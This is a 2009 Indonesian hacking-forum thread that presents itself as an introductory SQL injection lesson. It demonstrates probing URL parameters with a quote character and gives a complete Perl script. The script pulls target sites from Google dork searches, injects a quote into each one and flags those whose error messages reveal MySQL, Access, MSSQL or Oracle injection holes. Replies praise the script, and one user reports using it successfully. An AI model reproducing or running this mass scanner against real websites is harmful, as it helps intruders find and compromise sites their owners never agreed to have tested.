TEknIk MEndasar Sql Injection Season 1

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
^s0n_g0ku^
Posts: 17
Joined: Sun Mar 15, 2009 9:08 am

TEknIk MEndasar Sql Injection Season 1

Post by ^s0n_g0ku^ » Thu Jun 11, 2009 6:51 pm

CAra Pertama Untuk MenceK web tersebut ada hole sql injectionnya atau tidak maka lakukan cara seperti ini
setiap pertama kali test tambahkan tanda ('), atau (""), atau Tanda (;).


contoh:

[url sebelum di test] http://www.example.com/news.asp?id=10
[Testing Sql] http://www.example.com/news.asp?id=10'

jika web tersebut ada sql injectionnya maka akan keluar eror seperti ini :

[HTTP Response]-----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

Untuk cara mudah mencari web yang vuln sql atau tidak maka aku akan memberikan simple perl scrip untuk mensearch sql injection.

Code: Select all

-----------------------------------------------------------------------------------

	#!/usr/bin/perl
	use LWP::Simple;
	use LWP::UserAgent;
	use HTTP::Request;
	my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } 
	print "+++++++++++++++++++++++++++++++++++\n";
	print "+     XcoDe google Sql SearcH     +\n";
	print "+           XcoDer Crew           +\n";
	print "+++++++++++++++++++++++++++++++++\n\n";
	print "Insert Dork:";
	chomp( my $dork = <STDIN> );
	print "Total Query Pages (10 Links/Pages) :";
	chomp( my $page = <STDIN> );
	print "\n[+] Result:\n\n";
	for($start = 0;$start != $page*10;$start += 10)
	{	
	$t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
	    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
	    $ua->timeout(10);
	    $ua->env_proxy;
	    $response = $ua->get($t);
	    if ($response->is_success)
	    {
	        $c = $response->content;
	        @stuff = split(/<a href=/,$c);
	        foreach $line(@stuff)
	        {
	            if($line =~/(.*) class=l/ig)
	            {
	                $out = $1;
	                $out =~ s/\"//g;
			$out =~s/$/\'/;    
			$ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
			$ua->timeout(10);
			$ua->env_proxy;
			$response = $ua->get($out);
			$error = $response->content();
			if($error =~m/mysql_/ || $error =~m/Division by dh4n in/ || $error =~m/Warning:/)
				{print "$out => Could be Vulnerable in MySQL Injection!!\n";}
			elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
				{print "$out => Could be Vulnerable in MS Access Injection!!\n";}
			elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
				{print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
			elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
				{print "$out => Could be Vulnerable in Oracle Injection!!\n";}
		    }
		}
	    }
        }

	[End code]----------------------------------------------------------------------------------
	

SampAi JumPa di kelanjutannya nanti

Spesial Thanks to 

ZeQ3uL && JabAv0C And Milworm.com Crew And BatamhackerCrew
Top
N4ck0
Posts: 65
Joined: Tue Mar 03, 2009 9:57 pm
Location: Under
Contact:
Contact N4ck0

Re: TEknIk MEndasar Sql Injection Season 1

Post by N4ck0 » Thu Jun 11, 2009 8:40 pm

di atas jalaninnya lewat perl yah kk
Top
User avatar
^s0n_g0ku^
Posts: 17
Joined: Sun Mar 15, 2009 9:08 am

Re: TEknIk MEndasar Sql Injection Season 1

Post by ^s0n_g0ku^ » Thu Jun 11, 2009 9:06 pm

Yups betul....satu lagi pembelajarannya setiap scrip yang memakai tandai


#!/usr/bin/

pada awal mulanya maka untuk menjalankan scrip tsb kamu pakai perintah perl <nama file>
Top
User avatar
Bi4kKob4r
Posts: 254
Joined: Sat Jul 21, 2007 11:45 am
Location: Bi4kKob4r~root : ls..
Contact:
Contact Bi4kKob4r

Re: TEknIk MEndasar Sql Injection Season 1

Post by Bi4kKob4r » Thu Jun 11, 2009 9:39 pm

sip bos... nice post :D
I think just : Make better than the best

Life is Love,
Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.
Top
m4yIT_cyb3r5
Posts: 7
Joined: Fri Jun 12, 2009 2:49 am

Re: TEknIk MEndasar Sql Injection Season 1

Post by m4yIT_cyb3r5 » Fri Jun 12, 2009 3:58 am

ampoon ada master database
apa jgn2 bnyak master oracle disini
:mrgreen: :mrgreen:

teruskan pengguruan mu gan
:D :D :D

indONE S1_and_IT
Top
User avatar
bocahmiring
Posts: 58
Joined: Wed Mar 04, 2009 6:00 pm
Location: Jogja Berhati Nyaman
Contact:
Contact bocahmiring

Re: TEknIk MEndasar Sql Injection Season 1

Post by bocahmiring » Fri Jun 12, 2009 7:57 am

^s0n_g0ku^ wrote:Yups betul....satu lagi pembelajarannya setiap scrip yang memakai tandai


#!/usr/bin/

pada awal mulanya maka untuk menjalankan scrip tsb kamu pakai perintah perl <nama file>
/usr/bin/perl mungkin maksudnya?

soalnya ada juga bin bash, bin python, dan konco-konconya :D
permisi... numpang tenar...
http://bocahmiring.com
Top
User avatar
JokerKliker
Posts: 33
Joined: Sat Jan 10, 2009 6:00 pm
Location: Gotham City
Contact:
Contact JokerKliker

Re: TEknIk MEndasar Sql Injection Season 1

Post by JokerKliker » Fri Jun 12, 2009 4:58 pm

Codingnya hebat tenan sob.
Ditunggu season 2-nya. :mrgreen:
~~~
Top
User avatar
Gumux_1107
Posts: 102
Joined: Wed Dec 19, 2007 1:41 pm
Location: Infront of My Computer
Contact:
Contact Gumux_1107

Re: TEknIk MEndasar Sql Injection Season 1

Post by Gumux_1107 » Fri Jun 12, 2009 8:40 pm

Mantap,....
:D
________________________________________________________________________________
SYNTAX ERROR
Top
User avatar
bernadsatriani
Posts: 71
Joined: Sat Jan 17, 2009 5:23 am
Location: localhost
Contact:
Contact bernadsatriani

Re: TEknIk MEndasar Sql Injection Season 1

Post by bernadsatriani » Sat Jun 13, 2009 10:46 am

bocahmiring wrote:
^s0n_g0ku^ wrote:Yups betul....satu lagi pembelajarannya setiap scrip yang memakai tandai


#!/usr/bin/

pada awal mulanya maka untuk menjalankan scrip tsb kamu pakai perintah perl <nama file>
/usr/bin/perl mungkin maksudnya?

soalnya ada juga bin bash, bin python, dan konco-konconya :D

/usr/bin/perl
maksudnya file/script tersebut di jalankan di perl


@^s0n_g0ku^
buset dah..
nongol lagi ni anak :D
Top
d_ferdian
Posts: 4
Joined: Thu Mar 05, 2009 2:34 am

Re: TEknIk MEndasar Sql Injection Season 1

Post by d_ferdian » Mon Jun 15, 2009 2:36 am

thx ilmunya kk ,... :D :D
udah di coba scriptnya,.. bisa,.. lebih mudah mengetahui web yg vuln :D :D
Top
Post Reply

Return to “Web Hacking”